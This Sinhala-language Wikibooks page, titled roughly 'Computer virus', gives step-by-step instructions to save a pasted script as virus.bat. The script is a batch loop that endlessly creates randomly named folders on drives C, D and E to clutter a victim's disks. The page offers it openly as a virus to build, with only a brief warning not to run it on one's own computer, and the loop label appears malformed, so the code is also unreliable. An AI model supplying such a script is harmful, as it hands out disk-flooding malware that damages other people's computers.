පරිගනක වඉරස්

Wikibooks වෙතින්
Jump to navigation Jump to search

ඔබටම වපරිගනක වඉරසයක් මෙහිදි නිර්මානය කල හක.මෙහිදි ඔබෙ පරිගනකයෙ කිසිම විටෙක උත්සාහ නොකරන්න.මුලින්ම ඔබෙ නොට්පzඩ් විව්ත්ත කරගන්න. පසුව මෙම සටහන කොපි කර හිස් නොට් ප්zඩ් හි පෙස්ට් කර virus.bat ලෙස සෙව් කරන්න

@echo off

VIRUS

cd /d C: md %RANDOM% cd /d D: md %RANDOM% cd /d E: md %RANDOM% goto VIRUS REM ####################### REM errorcode401.blogspot.in

"https://si.wikibooks.org/w/index.php?title=පරිගනක_වඉරස්&oldid=9190" වෙතින් සම්ප්‍රවේශනය කෙරිණි